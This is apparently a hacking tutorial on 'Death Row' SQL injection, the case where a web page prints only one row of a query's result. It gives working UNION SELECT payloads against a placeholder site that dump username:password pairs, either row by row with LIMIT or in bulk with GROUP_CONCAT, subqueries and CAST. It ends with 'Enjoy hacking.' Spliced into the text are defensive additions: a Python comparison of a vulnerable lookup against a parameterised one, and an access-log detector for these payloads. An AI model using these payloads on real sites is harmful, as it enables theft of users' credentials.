Note: If you have not read the Basic Injection Tutorial
What is Death row?
Well, while injecting a web application you will usually run into it: this is the scenario in which the whole result set of the query does not get printed. The web application simply prints the first row.
For Example:
The query "Select username,password from users;" will return the complete list of users, but what you actually see depends on how the web application renders its output. So normally, in 70% of cases, you will have to face "Death Row Injection".
To overcome this situation we use LIMIT, or, if we are clever enough, we build a condition through which we can output only the data we actually need. Here we will discuss both of these ways.
Let us first understand the internal queries.
Select username from users;
This will return all the usernames, but our target web application outputs only one. So, to iterate through the result set, we will use LIMIT.
Syntax: LIMIT "From Row Number", "Number of Rows"
I hope it is very clear that the first parameter is the row number (counting from 0) at which you want to start, and the second one is the number of rows you want returned.
Now let us try it with the above Query
Query:
Select Username from users limit 0,1;
Example from the injection Point of view
www.vuln-site.com/index.php?view=43
If you have read the basic injection tutorial then I don't need to tell you how to trigger the error, comment out the rest of the query and then find the number of columns. After doing all that, let us assume the injection is:
www.vuln-site.com/index.php?view=-43 union select 1,2,3,4,5--
As you can see, the single quote is missing after 43, which means I am injecting into an integer input query. So now let us try to get the usernames and passwords using the above query.
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users--
The above query would return all rows at once, but the web application may show just one. So, to get all of them using LIMIT, we go one row at a time.
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 0,1--(first row)
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 1,1--(2nd row)
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit n,1--(nth row)
NOTE: The bracketed text after each query, such as "(first row)", is not part of the query; it is there only for a better explanation.
So now we can keep increasing the first parameter to get each row one by one. But if the database is huge... damn, it's a headache to go on like this, and a lazy guy like me will never want to go through this torture. So there is another way to handle the situation.
We can use a subquery to extract a particular number of rows from the database and then concatenate them into the output. Here is an example of how to do this:
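The row-by-row LIMIT walk above only works because the numeric view parameter is pasted straight into the SQL text, and printing a single row ("death row") does nothing to stop it. The following is an added example, not code from the original post: a vulnerable lookup beside its hardened form, using an in-memory SQLite database with a constructed posts/users schema. SQLite has no MySQL concat() or 0x3a string literal, so the page's payload is adapted to SQLite's || operator and a plain ':' (an assumption of this example, not the tutorial's syntax).

```python
import re
import sqlite3

# Constructed demo schema standing in for the tutorial's application: a 'posts' table read by
# index.php?view=<id> (five columns, matching the union select 1,2,3,4,5 probe) and a 'users'
# table holding credentials. All values are made up for the example.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, category TEXT, body TEXT, created TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO posts VALUES (43, 'editor', 'news', 'Hello world', '2024-01-01');
        INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return con

# The tutorial's "limit 0,1" payload, adapted to SQLite string concatenation (assumption: ||
# instead of MySQL concat(), ':' instead of the 0x3a hex literal).
DEMO_PAYLOAD = "-43 union select 1,2,username||':'||password,4,5 from users limit 0,1--"

def fetch_view_unsafe(con, view):
    # Mirrors the vulnerable pattern: the request value is pasted into the SQL text.
    # Because the parameter is numeric there are no quotes, so quote-escaping would not help.
    sql = "SELECT id, author, category, body, created FROM posts WHERE id = " + str(view)
    # The application shows only the first row ("death row"). That is not a defence:
    # with id = -43 matching nothing, the attacker's chosen row *is* the first row.
    return con.execute(sql).fetchone()

def fetch_view_safe(con, view):
    # Hardened form: strict type validation first (ASCII digits only, optional sign),
    # then the value is bound as a parameter so the database never parses it as SQL.
    text = str(view).strip()
    if not re.fullmatch(r"-?[0-9]+", text):
        raise ValueError("view must be an integer id")
    return con.execute(
        "SELECT id, author, category, body, created FROM posts WHERE id = ?", (int(text),)
    ).fetchone()

if __name__ == "__main__":
    con = make_db()
    print("unsafe, normal input :", fetch_view_unsafe(con, 43))
    print("unsafe, payload      :", fetch_view_unsafe(con, DEMO_PAYLOAD))
    print("safe,   normal input :", fetch_view_safe(con, 43))
    try:
        fetch_view_safe(con, DEMO_PAYLOAD)
    except ValueError as e:
        print("safe,   payload      : rejected ->", e)
```

The point of the comparison: the unsafe lookup hands back a credential row even though it calls fetchone(), while the safe version rejects the input before any query is built. Parameter binding alone would also defeat the injection; the explicit integer check is there so that malformed input is logged and refused at the edge rather than silently turned into an empty result.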
Query:
select group_concat(username,0x3a,password,0x0a) from (select username,password from users limit 0,100)a;
So the above query gets 100 rows concatenated into the output (the derived table needs an alias, here "a", or MySQL rejects the query). Let's see how the injection will look.
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a-- (first 100 rows)
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 100,100)a-- (100 rows from 100th row)
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit n,100)a-- (100 rows from nth row)
In this way we can speed up the process. But again, if we think of a database containing lakhs (hundreds of thousands) of rows, it becomes a headache once more. So one might think we can increase the number of rows each time we inject to speed things up. Hmm, but there is a problem: GROUP_CONCAT has a limit of 1024 characters (MySQL's default group_concat_max_len) and it will trim the rest of the characters. So there is another way out of it: we can use the CAST function to increase the buffer.
Query:
SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM users;
I have increased the buffer to 2048; you can try to increase it more, for example to 8192, but not beyond that since, as you know, that is the default limit of a POST output. Hmm, so what if you can't get everything at once? We can again use the subquery trick.
SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM (SELECT username,password FROM users LIMIT 0,2000)a;
Well, now the process is fast enough. Let us check our injection.
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--(first 2000 rows)
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 2000,2000)a--(2000 rows from 2000th row)
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 4000,2000)a--(2000 rows from the 4000th row)
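Every variant shown above, the single-row LIMIT walk and the GROUP_CONCAT/CAST chunks, leaves the same fingerprints in the web server's access log: a UNION SELECT in a parameter value, a "LIMIT offset,count" pair, GROUP_CONCAT, CAST(... AS CHAR(n)), 0x.. hex literals and a trailing comment marker. The following is an added example, not part of the original post: a small log analyser that URL-decodes each request's parameters, scores those indicators, and collects the LIMIT offsets seen per client so that the stepping pattern (0,1 then 1,1 ..., or 0,2000 then 2000,2000 ...) is visible. The log lines are constructed for the example, modelled on the tutorial's requests plus two benign ones.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in common log format (not real traffic). Lines from 10.0.0.9 are
# modelled on the tutorial's requests; 10.0.0.5 and 10.0.0.7 are benign and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?view=43 HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?view=-43%20union%20select%201,2,3,4,5-- HTTP/1.1" 200 4001
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?view=43%20union%20select%201,2,concat(username,0x3a,password),4,5%20from%20users%20limit%200,1-- HTTP/1.1" 200 4010
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?view=43%20union%20select%201,2,concat(username,0x3a,password),4,5%20from%20users%20limit%201,1-- HTTP/1.1" 200 4010
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?view=43%20union%20SELECT%201,2,CAST(GROUP_CONCAT(username,0x3a,password,0x0a)%20AS%20CHAR(2048)),4,5%20FROM%20(SELECT%20username,password%20FROM%20users%20LIMIT%200,2000)a-- HTTP/1.1" 200 9876
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=limit%20my%20results HTTP/1.1" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Indicators taken from the constructs the tutorial uses, each with a weight reflecting how
# specific it is on its own (a bare "limit" word, as in a search phrase, scores nothing).
INDICATORS = {
    "union_select":       (re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I), 5),
    "limit_offset_count": (re.compile(r"\blimit\s+\d+\s*,\s*\d+", re.I), 2),
    "group_concat":       (re.compile(r"\bgroup_concat\s*\(", re.I), 3),
    "cast_as_char":       (re.compile(r"\bcast\s*\(.*\bas\s+char\s*\(\s*\d+\s*\)", re.I), 2),
    "hex_literal":        (re.compile(r"\b0x[0-9a-f]{2,}\b", re.I), 1),
    "comment_terminator": (re.compile(r"(--|#|/\*)\s*$"), 1),
}
LIMIT_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*(\d+)", re.I)

def analyse_line(line):
    """Return a list of findings (one per suspicious parameter) for one log line, or None
    if the line does not parse. Parameter values are URL-decoded before matching."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
    findings = []
    for name, value in params:
        hits = [k for k, (rx, _) in INDICATORS.items() if rx.search(value)]
        if not hits:
            continue
        lm = LIMIT_RE.search(value)
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "param": name, "indicators": hits,
            "score": sum(INDICATORS[k][1] for k in hits),
            "limit": (int(lm[1]), int(lm[2])) if lm else None,
        })
    return findings

def analyse_log(text):
    """Aggregate findings per client IP: how many flagged parameter values, which indicators,
    the highest single score, and the LIMIT (offset, count) pairs in order of appearance."""
    summary = {}
    for line in text.splitlines():
        for f in analyse_line(line) or []:
            s = summary.setdefault(f["ip"], {"flagged": 0, "indicators": set(),
                                             "max_score": 0, "limits": []})
            s["flagged"] += 1
            s["indicators"].update(f["indicators"])
            s["max_score"] = max(s["max_score"], f["score"])
            if f["limit"] is not None:
                s["limits"].append(f["limit"])
    return summary

if __name__ == "__main__":
    for ip, s in analyse_log(SAMPLE_LOG).items():
        print(ip, "flagged:", s["flagged"], "max score:", s["max_score"],
              "indicators:", sorted(s["indicators"]), "limit steps:", s["limits"])
```

The per-client LIMIT sequence is the useful signal here: a single UNION SELECT may be a probe, but a run of requests whose only difference is an incrementing offset (or a fixed 2000-row stride) is enumeration in progress and is worth an alert in its own right, independent of the raw score. Matching is done on decoded parameter values rather than the raw request line so that %20 and similar encodings do not hide the keywords.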
Well, if you are still feeling lazy, then try Evil Twin Injection, which uses variables, functions and subqueries to dump the database.
Have fun. Enjoy hacking.